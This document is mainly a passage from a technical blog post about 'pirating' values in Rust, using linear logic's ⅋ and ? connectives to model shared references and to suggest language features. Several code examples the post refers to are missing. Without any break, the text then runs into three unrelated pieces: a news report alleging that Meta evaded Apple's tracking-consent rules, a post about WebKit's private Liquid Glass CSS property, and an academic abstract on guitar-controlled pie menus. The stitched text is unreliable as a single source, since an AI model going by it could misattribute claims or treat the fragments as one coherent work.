operation like
mem::forget
or
ManuallyDrop
to forget it. Forgetting has to
be explicit; leaking leaves the object in existence from the type-system point
of view, you just never access it again; and dropping is done implicitly, but
can run custom code (and thus has to be treated from the type system point of
view as though the call to
drop
/
drop_in_place
were written explicitly). So
I think it's more accurate to view Rust's type system as "linear, but you have a
range of options for dropping/forgetting things intentionally".
The interesting aspect here is that in linear type systems, a ! type is defined
to be discardable even without explicitly using a function to get rid of it.
For most types, the type system will ensure that values of the type are dropped
when they leave memory, unless explicitly forgotten. For ! types, it doesn't:
it allows the type to just vanish even without being dropped. And that implies
a rule that Rust should have (and actually does have): a
Copy
type can't have
a destructor. Part of the reason I wanted to look at the type theory behind
pirating is that I was hoping for insights like this: if the type theory is
modelling your types correctly, then following the logic will teach you things
that should be possible or impossible in your language, and you can see whether
they actually are. If they aren't, either you aren't modelling the types
correctly, or you have a soundness hole or missing feature.
In any case, that's four connectives covered out of the six I want to discuss,
and (apart from the connective that represents function types) those are the
only ones I've ever seen anyone use in practice. The remaining connectives are
⅋ and ?, and ? is fairly easy to define in terms of ⅋.
But understanding ⅋ is something of a nightmare, and easily the most complicated
part of linear type theory (in the rare cases where you actually end up needing
it). Linear logic is actually very internally symmetrical, with ⅋ filling a
hole in a pattern: but it's a hole that might at first seem impossible to fill.
Some connectives produce types that are easier to produce than others; and
connectives that are easier to produce with are less useful for the consumer,
who can do less with them. Ordering the four non-exponential connectives from
easiest to consume to easiest to produce:
T
⊗
U
is produced by producing two objects, a
T
and
a
U
, and the consumer gets to
consume two objects, the
T
and
the
U
;
T
&
U
is produced by producing one object that's both a
T
and
a
U
,
but the consumer has to choose whether to consume that one object as a
T
or
a
U
;
T
⊕
U
is produced by producing a single object that's a
T
or
a
U
, and
the consumer has to consume that one object as a
T
or
a
U
, whichever it
happens to be; and to complete the pattern,
T
⅋
U
is produced by producing a
T
or
a
U
but that somehow acts like
two objects, and the consumer has to consume both objects, the
T
and
the
U
.
Unlike the first three connectives, ⅋ seems impossible and nonsensical. When
producing it, the producer is doing something apparently impossible (and yet
this is
easier
for the producer, somehow, than ⊕ which appears to give the
producer maximum flexibility in how to produce). When consuming it, you get two
objects, but somehow that's harder for the consumer to handle (and less useful
for producing things with) than getting only one.
I think I have a good intuition for what ⅋ is actually doing, now. But something
this strange is going to take a lot of explaining, so it's going to take me a
whole section to see if I can convey my intuition in a way that readers will
understand.
Understanding linear logic's ⅋ and ?
“I should like to buy an egg, please,” she said timidly. “How do you
sell them?”
“Fivepence farthing for one—Twopence for two,” the Sheep replied.
“Then two are cheaper than one?” Alice said in a surprised tone, taking
out her purse.
“Only you
must
eat them both, if you buy two,” said the Sheep.
— Lewis Carroll,
Through the Looking-Glass
Let's start with a situation where ⅋ might actually come up. It's too contrived
to be likely to happen naturally, but hopefully it'll nonetheless be possible to
understand what's going on.
Suppose we find an experienced JavaScript programmer who doesn't know any Rust,
and ask them to design the interface for a Rust library for making web requests
(this is a high-level library: you specify the URL you want to fetch, and get
the contents of the web page back, or an error code). There are two problems in
designing this API: a) how to deal with the delay between making the request and
getting the response, and b) how to deal with the fact that the return value
could be either a string or an integer.
For a), Rust programmers might use
async
, or just block on the request, but
the usual low-level primitive behind this sort of thing in JavaScript would be a
callback: although it would normally be wrapped up into a promise in modern
JavaScript, someone who didn't know the language they were working in would be
likely to try the simple things first, so it's quite plausible that they'd come
up with an API that uses a callback. For b), obviously the correct interface is
a tagged union (Rust
enum
– a Rust programmer would probably use
Result
),
but someone who didn't know Rust might not know about that feature and might
attempt to implement it manually.
So how do you implement a callback that conceptually takes an
enum
as
argument, without using an actual
enum
?
(looks up linear logic notes
and observes that to consume a
T
⊕
U
you can use a
T
-consuming function
& a
U
-consuming function)
The
correct
approach for this is to
define a trait with a method for each variant, so that you can determine which
variant you had by which method gets called:
However, someone who's unfamiliar with Rust would probably not use a trait, and
after looking up the correct syntax for taking a function as an argument, might
end up using a struct or tuple of two callbacks instead, or just ask for two
separate callbacks as method arguments:
// version 2fnhttp_request(url: &str,
success_callback:implFnOnce(&str),
failure_callback:implFnOnce(i32));
In version 1 of this API,
http_request
is effectively providing an
&str
⊕
i32
to the callback, which is what we'd expect. But in version 2, it's
providing an
&str
⅋
i32
.
Let's see what goes wrong from the point of view of creating the callbacks,
first. A ⅋ type is less useful for the consumer than a ⊕ type, and here, that
shows up when we try to borrow-check the callbacks. In version 1, there's no
issue with having the success and failure callback methods both try to use the
same fields of
self
: the whole
self
object gets moved into whichever
callback method gets called, and so the method has full access to all of
self
.
But in version 2, the success and failure callbacks are actual objects that
exist at the same time as each other, so they can't contain conflicting borrows;
for example, if both the success and failure callbacks want to write to some
sort of controller object, they won't both be able to hold a mutable reference
to it.
Is the borrow checker being unnecessarily restrictive here? A beginning Rust
programmer might think so, but a more experienced Rust programmer will recognise
that there's probably some valid hypothetical that the compiler is trying to
guard against. And in this case, it's not too hard to spot the potential issue:
nothing in version 2 of
http_request
actually specifies that only one of the
callbacks gets called. A malicious
http_request
could call the success
callback, or the failure callback, or the success callback
and
the failure
callback, or maybe it calls them in the opposite order. If the callbacks used
more complex argument types than
&str
and
i32
, it might find a way to pass
the success callback as an argument to the failure callback, or vice versa, and
trick the calling program into running one inside the other – and if either of
them were
Send
, it could run them simultaneously on different threads.
So this is what a
T
⅋
U
is: it's an object that could be a
T
, or a
U
, or a
T
and
a
U
that have to be safe to process together in some arbitrary way
that might involve processing them in any sequence, or in parallel, or
interleaving them, etc. The consumer can't tell which (unlike with ⊕ where it
can
tell which, and & where it can
choose
which), and has to dedicate
separate resources to the
T
and to the
U
just in case it ever gets given
both (even if the producer only actually happens to generate one). In a way
(that linear logic actually precisely defines!), ⅋ is the opposite of ⊗: a
T
⊗
U
can also be processed as a
T
, or a
U
, or a
T
then a
U
, or a
U
then a
T
, or both at the same time – but with ⊗, the
consumer
gets to choose
which, whereas with ⅋ it's imposed by the
producer
.
⅋ might not seem very useful, and indeed I haven't found anything simple or
useful in Rust that it corresponds to. But it can be used as a building block
for something more interesting. Think about what happens when the linear logic
connectives are used with both types the same:
T
⊗
T
is two
T
s: you can consume them both, so it provides twice the
resources a single
T
does;
T
&
T
is equivalent to just a single
T
(it's an object that can be
consumed as either a
T
or a
T
and the choice doesn't matter);
T
⊕
T
is effectively a
T
plus a boolean (because you can tell whether it
was a "left
T
" or a "right
T
");
and
T
⅋
T
is like a
T
, but has to be safe to process in parallel with
another
T
(even if that doesn't actually happen), so you need a second
copy of all the resources you might use to process it.
OK, so it's hard to see how a
T
⅋
T
a) could get created, or b) would be
useful even if it did. So let's go further: what about a
T
⅋
T
⅋
T
, or a
T
⅋
T
⅋
T
⅋
T
? What about the limit: imagine a type that could be
any
number of
T
s, ⅋ed together. This would be
T
⊕
T
⅋
T
⊕
T
⅋
T
⅋
T
⊕…,
which linear logic has a name for: it's ?
T
, where ? is the sixth and final
connective that I want to discuss in this blog post.
Let's think about what a ?
T
actually is. It's sort-of like a
T
, but
consumers are very restricted in what they can do when processing it: anything
they do has to be valid even if arbitrarily many copies of the same consumer
were trying to do the same thing before, after, during the processing of the
?
T
("same consumer" because you have to potentially be able to process
arbitrarily many
T
s but only have finitely many different consumers, so some
of them will be the same). They can't borrow anything mutably, because anything
they do might be done any number of times, and even twice wouldn't pass the
borrow checker. That also means that they can't use a mutable reference to
prove that they have unique access to memory: anything they try to write to
might potentially be aliased.
Once you've finished consuming, any result you produce is
also
a ? type. The
reason is that the original producer of the ? type gets to choose how many times
it might need to be processed and which of the results end up mattering, so if
you process a ? type and return a value, you don't actually know the structure
of that value: just that it's some number of copies of the return value and you
don't know which ones are valid or what sequence they ran in, so the best you
can do is produce a ? of the result type.
Writing while holding a ?
T
isn't outright impossible, but you can't rely on
the borrow-checker to tell you that it's safe: you'd need some other sort of
proof, like "this thing isn't
Send
so I know it's only being accessed from a
single thread" or "there's a lock around this object in order to protect it from
concurrent modifications". The same rules for writing apply to shared
references (the types that let shared references get around the restrictions are
Cell
and
Mutex
respectively), which should be enough to raise more than a
little suspicion.
What linear logic teaches us about pirating
All of this leads up to my big surprising discovery: even though Rust doesn't
(as far as I know) have anything that's modelled by ⅋, it does seem to have
something that's modelled by ?. In particular, the linear-logic-defined type
?
T
seems to be acting an awful lot like a pirated type
?T
. Thinking about
it, this makes a lot of sense: pirating a type effectively says "there may be
extra copies of this that aren't supposed to exist", and ? effectively says
"this value can only be handled in ways that are safe even if you have to allow
for the potential that extra copies of it exist and are being operated on".
To verify the theory, we just need to look at what ? is supposed to be able to
do and verify that Rust can do the same. The main interesting rule of ? in
linear logic is that if something can operate on a
T
using only resources
which have
!
type, then it can also operate on a ?
T
(producing a ? of the
result). In Rust, that translates to "a closure that is
Copy
can operate on a
pirated version of its argument to produce a pirated version of its result".
Unfortunately, this seems obviously wrong. Rust has some very simple closures
like
|x: &mut i32| *x = 10
which are
Copy
and return
()
(which is safely
piratable due to also being
Copy
), and yet would be unsound if you pirated the
argument in order to make it into a shared rather than mutable reference.
The mismatch comes down to what the assignment operator
=
is doing: in order
to be able to know that it can do the writing safely, it is making an "argument
from uniqueness" using the uniqueness of the mutable reference that it's writing
to. When given a pirated mutable reference (i.e. a shared reference) instead,
the uniqueness proof needs to come from somewhere else instead: but such a proof
would (obviously) not be
Copy
because then it would be able to prove to two
different closures that they both had a unique access. So the correct
conclusion is "a closure that is
Copy
can operate on a pirated version of its
argument to produce a pirated version of its result, as long as it does not make
an argument from uniqueness" (or, at least, if it wants to make such an
argument, it has to somehow obtain a non-pirated uniqueness proof despite being
Copy
). This reasoning somewhat suggests that arguments from uniqueness should
be a type-system-level concept, given that it shows up in the logic and
influences it.
If this is a type-system-level concept, it should be possible to find it in the
type system! And indeed, there are a couple of places that I've seen it before.
One of them is in
my previous blog post
, which
ended up implementing
Cell
in safe Rust via using scoped generics. It did
that by using a scoped generic that represented the permission to access
Cell
s: while you were operating inside a
Cell
, you didn't have the
permission and thus couldn't form a new reference to the inside of a
Cell
while you already had one. This is a sort of argument from uniqueness, but one
that's visible as a concrete object in the type system (which I'll call a "cell
permission").
In a way, Rust's existing
Cell
works a bit like that too: you can think of it
as storing a cell permission in a thread-local variable, taking it for the body
of each method on
Cell
and returning it before the method exits. (This is the
reason why you can't borrow a reference from the inside of a
Cell
: the cell
wouldn't be able to return the permission to the thread-local variable while the
permission was still needed to hold the reference alive.) Because the
permissions are thread-local, you can't sync a
Cell
to another thread because
then both the old and new threads might be able to use their own permissions to
access it at once. On this reasoning,
Cell
should be
Send
if it contains a
Send
type, but never
Sync
(and it does indeed have those specific trait
implementations).
Still, Rust's current
Cell
implementation is currently clearly not as powerful
as the theory suggests it should be: even in current Rust, without scoped
generics, it should be possible to represent a cell permission in the type
system and use it to access cells which can't be proven accessible in other
ways. This suggests that Rust is missing a feature; and although I can't find
the feature in question in the Rust standard library, I was able to find it in a
couple of places on crates.io:
ghost-cell
has an implementation backed
by some formal logic proving that the idea is correct, and
qcell
has four different
implementations, which differ in the arguments from uniqueness that they use to
generate the cell permission in the first place. So it seems like such a
feature reasonably could/should exist in the language.
Another interesting observation about arguments from uniqueness: normally, such
arguments can be used to justify writes; but if you pirate one of them, it can
no longer make writes safe because it might conflict with a pirated copy of
itself. However, the pirated proof still proves that there are no conflicting
writes (because pirating it prevents it being used for writing but doesn't give
anything else the ability to write), and thus it makes reads safe. So this
gives, in a sense, a mathematical justification for why shared references work
to make reading safe: extra justification for that probably wasn't needed, but
it was still a little surprising (and somewhat mathematically elegant) to see
such a justification turn up.
Unfortunately, I wasn't able to conclude much more from the "something that maps
T
to
U
can map ?
T
to ?
U
if all its resources are
Copy
" rule. The rule
feels as though, in Rust, it wants to operate by updating every pirated copy of
the object simultaneously, but even if that would be sound, it would be
impossible to implement due to not tracking where the copies actually are.
There is another ?-related rule in linear logic: ??
T
is the same as ?
T
.
Although that one's almost degenerate in linear logic, it's interesting in the
context of Rust because it effectively makes pirating more transparent than
referencing: in Rust,
T
,
&T
and
&&T
can all have different trait
implementations, whereas the fact that
?T
and
??T
are the same means that
it's hard to distinguish between
U
and
?U
in traits that are generic over
U
(because
U
might be
?T
).
This means that some trait implementations get weirder. Logically, you would
want pirated copies of objects to implement pirated copies of their traits (the
most obvious example in this direction is that pirating
DerefMut
gives you
Deref
). But going down this line tears
Clone
in two different directions:
one wants to be consistent with
Copy
, cloning a
?T
as a different
?T
by
copying it, and the other wants to clone a
?T
as a
T
(but also wants to
clone a
??T
as a
T
, not a
?T
). And weirdly, it turns out that the Rust
library team has already accepted an API change proposal to add the second of
these traits (that clones a
?T
as a
T
), calling it
CloneFromCopy
, which is
particularly strange given that current Rust doesn't even
have
a pirating
operator – I was unaware of the trait in question before I started writing this
blog post, and only coincidentally learned about it while doing something
unrelated. (The details are in
this GitHub
issue
:
the idea of
CloneFromCopy
was discovered in the process of trying to implement
a way to safely clone out of a
Cell
.)
Despite this weirdness, it definitely feels like a version of Rust that's based
on pirating and mutable references rather than on shared references and mutable
references (with
&T
being sugar for
?&mut T
) should be viable: I can think
in pirated Rust and it seems to logically hang together (both in terms of the
linear logic behind it and in terms of what the language can and can't do).
Having three sorts of reference-like things (mutable references, shared
references, pirated copies) rather than two might make finding a good syntax
hard, but hopefully that would be a resolvable problem. In most ways, the
language seems somewhat superior to current Rust, in that it doesn't force you
to create a reference merely to be able to share something (for many types, the
reference just adds an extra layer of indirection for no benefit), and doesn't
force you to write both shared and mutable versions of almost every method: and
it would be a superset of current Rust in that it you can implement shared
references in it, so you get all the functionality of current Rust in addition
to pirating as well.
Another interesting data point: I've been considering writing my own practical
programming language for a while, and part of the process of planning involved
thinking about what sort of memory model I wanted it to have (in many cases, by
thinking about programs I wanted to write and what sort of primitives I would
need to be able to write them). Although I started mostly from scratch, the
three "main" ways to pass arguments ended up corresponding fairly closely to
Rust's (
T
,
&T
,
&mut T
) – except that the
&T
was a little different, and
thinking about it in retrospect, what I came up with was
?T
rather than
&T
.
(The planning was quite prescient in that it also ended up with an equivalent of
scoped generics, with very different syntax but the same semantics.)
Unfortunately, it's almost certainly too late to switch Rust to be based on
pirating rather than shared references at this point; there's likely a lot of
unsafe code that makes assumptions that are true in current Rust but become
false with pirating, you'd want to redesign a lot of standard APIs to use
pirated copies rather than shared references, some very core traits would start
working slightly differently, and all the existing tutorials would go out of
date: it'd be a very wide-reaching change.
Still, even if it's too late to make this large a change to Rust as a whole,
maybe it isn't too late to learn some lessons from the thought-experiment
version of Rust, and find some features that are missing from the real version.
What pirating teaches us about Rust
Shares of reference-counted references
The most obvious place to look for missing features in current Rust is by
pirating its existing reference types. After all, this blog post managed to
recreate Rust shared references by starting with Rust mutable references and
pirating them: so maybe something interesting happens if we pirate some other
sort of reference?
And indeed, a missing feature turns up almost immediately: just consider
?'a Rc<T>
or
?'a Arc<T>
. The semantics of these are fairly easy to explain:
they're created from an existing
Rc
/
Arc
(i.e. one of the potentially many
references to a reference-counted object), assert that that particular reference
they were created from won't be dropped during the lifetime
'a
, and can be
freely cloned during that lifetime without actually needing to change the
reference count (making the clones more efficient). The advantage over
&'a
Rc<T>
/
&'a Arc<T>
is that it saves a level of indirection, leading to simpler
code (especially in the generated executable); the advantage over
&'a T
is
that you can use it to clone the underlying
Rc
/
Arc
, even with a lifetime
that extends beyond
'a
; and the advantage over
Rc
/
Arc
is that it cuts down
on reference count updates, which can be really slow (especially with
Arc
– it
uses atomic read-modify-write operations, which are some of the slowest
instructions typical processors have – but even
Rc
needs to guard against the
reference count overflowing and the overflow checks usually make reference
increments and decrements impossible to optimise out).
The
?Rc<T>
and
?Arc<T>
types seem to be missing from the Rust standard
library, but I found them in a couple of crates on crates.io:
rc-borrow
is a direct implementation of
them, but is hardly used; and
triomph
implements the
equivalent
for
its own
Arc
implementation. My guess is that although the feature in question
is a clear improvement over the alternatives in the case where you need it, it
isn't
enough
of an improvement to be worth adding a dependency (dependencies
have a substantial cost of their own, so you don't want to add one unless you
see a comparable gain).
Why shallow snapshots don't work
A different way in which pirating might seem useful is to create a "snapshot" of
a value: it at first seems like it might be useful to take a copy of something
so that you can safely use it after the original changes. But one lesson I
learned from pirating all those reference types was that this sort of copy has
similar safety rules to a shared reference: it has a lifetime, and you can't
change the original until the lifetime is over. In this situation, you really
need a clone (cloning deeply if that's how the type's
Clone
implementation
works), rather than a shallow copy; otherwise, if the original is modified or
dropped, that might cause something owned by the original to be dropped, leaving
a dangling reference in the copy. (While writing this paragraph, I
realised
that
CloneFromCopy
had exactly this
issue
and thus was unsound, and
the design was changed as a
consequence
.
Although I was hoping to learn lessons about Rust from the experiment into
pirating, I wasn't expecting them to be so immediately practically relevant!)
Trait implementations on references
The whole
Clone
versus
CloneFromCopy
thing got me thinking about how trait
implementations interact with references more generally. It feels like Rust
"wants" to, in general, make references implement the same traits as the things
that they reference (and the "
??T
is
?T
" equivalence provides an argument
that something like that should be expected) – although with shared references,
you get a "read only" version of the trait (because a shared reference is a
pirated mutable reference, and pirating an object gives you a read only version
of its traits). In particular, it's rare for both the reference and the
referenced object to implement the same trait differently.
There are a couple of notable exceptions:
Clone
and
Debug
both make sense at
different abstraction levels (you can clone an
Rc<T>
or you can clone the
T
inside it; and you can get debugging details either for the referenced object or
the reference itself). But the interesting thing here is that the two cases
seem to differ. When cloning, usually you want to clone the reference because
it's usually either cheaper than, or entirely equivalent to, cloning the object
(although if you specifically need a deep copy of an interior-mutable object,
you need to clone the object itself rather than a reference wrapping it). When
you're debugging code, normally you care about debugging the referenced object
rather than the reference itself.
Rust defaults to taking the trait implementation from the reference, which makes
<Rc as Clone>::clone()
work correctly – but it would "naturally" make
Debug
give the wrong behaviour. As such, reference types are normally implemented to
just copy the results of
Debug
of the inner value: but that means that you
can't debug a reference (which is annoying when you're writing your own custom
reference types). It also becomes a little incoherent sometimes: one of the
references I wrote was basically a "proof that a
MaybeUninit
is initialised,
plus a reference to the value inside it", and it wraps a reference to the
MaybeUninit
. If the inside value is
Debug
, by Rust's normal rules the
reference's
Debug
implementation should delegate to that, but that means
manually overriding the inside reference's
Debug
(which can't get at the
referenced object because it doesn't know whether the memory it points to is
initialised). If it isn't, then it would be nice to be able to
Debug
the
inside reference instead: but that would be incoherent. This sort of thing
makes me think that at least
Debug
(and possibly also
Clone
) is probably
defined incorrectly (in particular, I am wondering whether it would make more
sense if
Debug
on a reference debugged the reference itself, but the
{:?}
format specifier
Deref
fed as many times as possible before using the
Debug
implementation, with a separate format specifier available to use
Debug
directly).
Packed types
Another topic which can usefully be thought about in terms of pirating is that
of packed or bit-packed types. Most types in Rust have an alignment of more
than 1, which means that pointers to them don't use all the bits of their
storage (the lowest bit is always 0). Suppose you have an
enum
like this
(this example is similar to something that came up in a program I was writing
recently):
Presently, Rust will store this using an amount of memory that's twice the size
of a pointer; for example, on a 64-bit system, it will use 64 bits to store the
reference (with 3 of those bits always being 0), and another 64 bits to store
the leaf/branch status (there is no gain from using fewer, because the
Tree
structure needs to have a size that's a multiple of 64 bits). It would
obviously be much more memory-efficient to store this in half the size, by
(e.g.) flipping the bottom bit of a
Leaf
reference so that it could be
distinguished from a
Branch
reference; this is a "bit-packed" type because
it's packing extra data into one of the known bits of a field.
The issue with packed and bit-packed types is that it's very difficult to use
them soundly. A reference is supposed to point to memory that contains a value
of the correct type: but (e.g.) if you tried to form a reference to the field of
a
Leaf
, the memory it was pointing to would not contain a
&'a u64
like it
was supposed to, but rather a "
&'a u64
with the bottom bit flipped" (which is
not the same type because its memory representation is different). Rust's
current solution to this sort of problem is "you have to move or copy the value
out of the packed type before you can do anything with it". That works in the
case of
Tree
above, because
&'a u64
is
Copy
and so you can copy it out of
the packed type freely.
What about packed types whose fields aren't
Copy
? In present Rust, they're
almost completely unusable (you have to entirely destructure the type in order
to do anything with its contents), because you can't copy the fields. However,
rather than copying, what about pirating the fields? That gives you a little
less power than copying or forming a reference would (e.g. you don't get to
mutate the resulting value with interior mutability), but there are still a lot
of things you can soundly do with it (and having a theory of pirating helps to
clarify what those are). Without pirating existing as a language feature in
Rust, the compiler won't be able to help you use packed fields directly; but it's
still possible to use the theory to analyse unsafe code that does the same
thing, and get a quick idea of whether it is likely to be sound or not. This
line of reasoning also implies that adding a pirating operation to Rust might be
beneficial even if it isn't used pervasively throughout the API; it would still
be useful for forming "references" to packed fields.
The case for pirating in Rust
Normally I like to end blog posts with a conclusion. But in this case, the
situation is more like "I had an idea, experimented with it, learned a lot of
new things as a result, and it just lead to more ideas – but I don't know
whether they're good ideas and haven't formed an opinion on them". Sometimes
(as with scoped generics) doing research leads to a conclusion, a thesis you can
argue and try to convince other people of; and then you get a nice,
self-contained blog post. But sometimes, rather than a thesis, you just end up
with more questions: and that sort of result can also be useful in its own way.
So instead of a conclusion, I'm going to finish by arguing one side of a debate:
presenting a list of arguments that maybe adding pirating to Rust would actually
be a good idea after all. I haven't yet decided whether or not it would make a
good addition to the existing language; I
am
pretty sure I would add it if I
were redoing Rust from scratch, but the trade-offs for changing an existing
language are much larger. I think the downsides are obvious; but the upsides
(and arguments against the downsides) are much more interesting, and there are
more of them than I expected, so I'm going to write them out and let readers
make up their own minds.
A key observation is that the only observable difference between a pirated value
and a shared reference to the original value is that the shared reference
preserves the address. (You can convert a pirated value to a "shared reference
but with the wrong address" by storing it in memory, then reinterpreting a
pointer to it as a reference – Rust's code generation back-end already does that
sort of thing automatically when passing a sufficiently large value to a
function, so passing a large pirated value and passing a shared reference to
that value are actually very similar from the point of view of the generated
code.) That means that a pirating operation can alternatively be viewed as a
"shared reference, but you don't do anything that depends on its address"
operation (the main things this rules out are converting it to a pointer, and
writing through it using interior mutability).
Rust's type system already tracks whether or not a reference is to a type with
interior mutability, so the difficult part is working out whether or not a
shared reference is ever converted to a pointer. This is a great time to deploy
another lesson about adding features to a language: if the feature is something
fundamental and important, you should be able to find individual uses or special
cases of it in the compiler already (e.g. one of the things that helped convince
me that scoped generics were the right design is that lifetimes are a special
case of them, so they just generalise something that Rust already needed). In
this case, the goal is to look for situations where the compiler is checking to
see if a shared reference ever gets converted to a pointer, and acting
differently based on whether it is or isn't.
And unsurprisingly, such situations do exist. The most important is in the
compiler back-end: one of the things Rust's compiler back-end LLVM does is that
it looks for functions that take shared references to small values and never use
the address, and converts them to take the value directly: in other words, it's
optimising referencing into pirating. Almost every nontrivial Rust program
requires this optimisation to avoid losing performance, because there are a lot
of standard library methods that take
&T
purely because they need to share the
value, not because they need the address. So Rust is implementing a sort of
"pirating inference": the lack of pirating in the language itself means that a
literal compilation of the code would be slower than in other systems
programming languages, and inferring pirating back into the program is used to
regain the performance.
This leads to a lot of complexity that doesn't inherently need to exist; and
forcing programmers to write simple code (pass by value) as something complex
(pass by shared reference), then optimising it back into the simple version, is
normally considered an anti-pattern. In this case, it's happening because
current Rust conflates the parameter passing method (by-value or by-address)
with the sharing rules (shared or exclusive). The complexity has practical
downsides, too: if the inference goes wrong (e.g. due to optimiser bugs), you
can end up with a program that's much slower than it should be (and such bugs
are probably fairly common: it didn't take me long to find
a recent such
bug
, and the comments on it
even discuss the issues with capturing a small value by reference when it could
have been captured by value). The complexity also likely slows down the
compiler somewhat, because there are so many references that need to be
optimised out and removing them is likely to take substantial time.
It turns out that knowing whether a reference is ever used as a pointer is
useful for more than optimisations, too. Programs that mix Rust code with code
in other languages often benefit from security mitigations due to scenarios like
"the Rust code creates a buffer and gives a pointer to it to the C code, and
then the C code overflows it", which means that if a pointer to a Rust buffer
can escape to C code, it improves security to have the compiled Rust code insert
checks to see whether the memory immediately after the buffer was overwritten
before it tries to do anything critical with the memory further beyond. But too
many checks can hurt performance, As such,
it has been
proposed
that the Rust compiler should insert such checks only after buffers for which a
reference is ever converted to a pointer: in other words, this is another case
where the compiler wants to act differently based on whether a reference is
truly being used as a reference, or whether it's just being used to simulate
pirating.
Trying to work out this sort of information by using a static analysis on every
compile is inherently somewhat slow: the analysis could be skipped if
information about the "reference used as pointer" status instead existed in the
program, so it seems like something that, ideally, should be handled in the type
system. As it happens, most Rust crates never actually need to convert shared
references to pointers (even crates that use low-level unsafe code usually do it
by storing pointers and converting them to references, rather than the other way
round). So it's possible to imagine, e.g., a crate attribute that says "this
crate doesn't do any shared-reference-to-pointer conversions" (perhaps
accompanied by a separate type that represents a shared reference that
can
be
converted to a pointer, although in a pinch you could use a shared reference to
a mutable reference,
& &mut
). If a whole crate graph sets the attribute, then
the Rust compiler would be able to take the relevant information directly from
the type system, and not need to do a slow and error-prone static analysis (and
if a crate didn't set the attribute, you could fall back to the old method of
doing things). Perhaps it could even be made the default in a future edition of
Rust.
And that seems like it would be a fairly small change. But once it had been
made, you would have pirating in Rust: for
T
without interior mutability,
&T
would now have the semantics of pirating (with the compiler being able to freely
choose between pass-by-value, pass-by-address, and pass-by-address-of-copy
depending on which was most efficient). It wouldn't be a "perfect"
implementation (e.g.
&T
and
&&T
would still be different types, and you
would occasionally need a
*
in the source code even in cases where it doesn't
correspond to an actual pointer dereference): but it would have the huge
advantage of being consistent with how current Rust works, meaning that the
existing tutorials would still work and programmers in general wouldn't need
retraining.
There might even be a way to get benefits like "you can take references to
packed fields now" (implemented as a copy, then either passing around the copy
or a pointer to it), although that seems like it would probably be out of reach
because it would stop working if someone added a dependency on an old crate that
used the old, address-carrying definition of shared references.
So it seems like a world where pirating is added to Rust itself might actually
potentially be viable: it would have lower upsides than the "everything is
written in terms of pirating now" world, but also lower downsides (and many
programmers might not even notice the change). It might be interesting to
implement it experimentally and see what the impact on compile times is like!
And even if it does turn out that adding pirating to Rust isn't worthwhile,
we've still learnt a lot from the experiment: hints on how to write custom
references, thoughts about the traits system, a suggestion to add shares of
Rc
and
Arc
, a bug caught, and a mathematical model of shared references that uses
a part of linear logic that previously didn't seem useful. It's been fun.
Perhaps I can go back to my experiment in implementing scoped generics now!
Meta bypassed Apple privacy protections, claims former employee
A former
Meta
product manager has claimed that the social network circumvented Apple’s
privacy
protections, as well as cheating advertisers, and fired him when he repeatedly raised the issue internally.
Meta is said to have found ways to identify Apple users even after they refused consent for app tracking, in order to avoid an estimated
$10 billion loss of revenue
…
Meta relied heavily on selling personalized advertising, which required it to be able to target particular demographics and interest groups. This was achieved by tracking individual users across different apps.
Apple’s
App Tracking Transparency
(ATT) was introduced in 2021 and meant that companies required user permission in order to carry out this tracking. Unsurprisingly, the vast majority of users declined.
It was estimated at the time that this would cost social media companies many billions of dollars, and Meta’s CFO warned investors that its own loss would be around $10B per year
A fired product manager at the company, Samujjal Purkayastha, has now taken his case to an employment tribunal claiming he was unlawfully dismissed for raising concerns about the practice, reports the
Financial Times
.
Meta secretly linked user data with other information to track users’ activity on other websites without their permission — despite Apple in 2021 introducing measures explicitly requiring consent, according to Purkayastha’s filings […]
A “closed and secretive” team at Meta is alleged to have used “deterministic matching” — gathering identifiable information that could then be used to connect data across multiple platforms in violation of Apple’s new privacy policies.
He also accuses Meta of inflating the value of sales achieved by advertising on its platforms.
Meta denies any wrongdoing, and claims that Purkayastha was dismissed for unrelated reasons. The tribunal was unable to rule immediately, and said a full hearing will be held later in the year.
I have an incredibly boring summer hobby: looking at the changelog for the
WebKit Github repo
. Why? Because I spend a chunk of my professional life working with webviews inside mobile apps and I like to get an early peek into what's coming in the next version of iOS. Since Tim Cook has yet to stand up at WWDC and announce "one more thing... Service Worker support in WKWebView, provided you add the correct entry to the
WKAppBoundDomains
array in your
Info.plist
" (and you know what, he
should
) manual research is the order of the day.
So I was really interested to see, the day after WWDC finished, a pull request named:
Liquid Glass
was one of the big takeaways from 2025's WWDC. Probably the biggest change in iOS UI since iOS 7 ditched the skeuomorphic look of the past. But that's all native UI, what does any of that have to do with webviews?
A poke around the context of the PR revealed something really interesting: Apple has a custom CSS property named
-apple-visual-effect
. Not only does it allow the use of Liquid Glass in iOS 26 (via values like
-apple-system-glass-material
) but all versions support using
standard materials
with values like
-apple-system-blur-material-thin
.
Yes it works and no, we can't
Before you, like me, fire up Safari and start editing some CSS, I have bad news: no, it doesn't work on the web. As well it shouldn't. But it
also
doesn't work by default in an app using WKWebView, you have to toggle a setting in WKPreferences called
useSystemAppearance
... and it's
private
. So if you use it, say goodbye to App Store approval.
I wanted to try it out all the same so I hacked around to set
useSystemAppearance
to true, set my CSS to:
With thanks to MapboxGL JS for the beautiful background
Whoever it was at Apple that decided to make this a CSS property is a genius because it makes it incredibly easy to provide different rules based on Liquid Glass support:
It's an interesting piece of trivia but no-one outside of Apple can use it. So what does it matter? It doesn't. Except for the implication for what I'll call Alastair's Grand Theory of In-App Webviews. Industry wide they don't have a great reputation. But my suggestion is this:
the main reason webviews in apps have such a bad reputation is because you don't notice the webviews that are integrated seamlessly.
It stands to reason that Apple wouldn't have developed this feature if they weren't using it. Where? We have no idea. But they must be using it
somewhere
. The fact that none of us have noticed exactly where suggests that we're interacting with webviews in our daily use of iOS without ever even realising it.
Nowadays, electric guitars are often used together with digital interfaces. For instance, tablature applications can support guitar practice by rendering and playing back the tabs of individual instrument tracks of a song (guitar, drums, etc.). However, those interfaces are typically controlled via mouse and keyboard or via touch input. This means that controlling and configuring playback during practice can lead to high switching costs, as learners often need to switch between playing and interface control. In this paper, we explore the use of audio input from an unmodified electric guitar to enable interface control without letting go of the guitar. We present GuitarPie, an audio-based pie menu interaction method. GuitarPie utilizes the grid-like structure of a fretboard to spatially represent audio-controlled operations, avoiding the need to memorize note sequences. Furthermore, we implemented TabCtrl, a tablature interface that uses GuitarPie and other audio-based interaction methods for interface control.
ACM UIST 2024
Andreas Fender
, Mohamed Kari
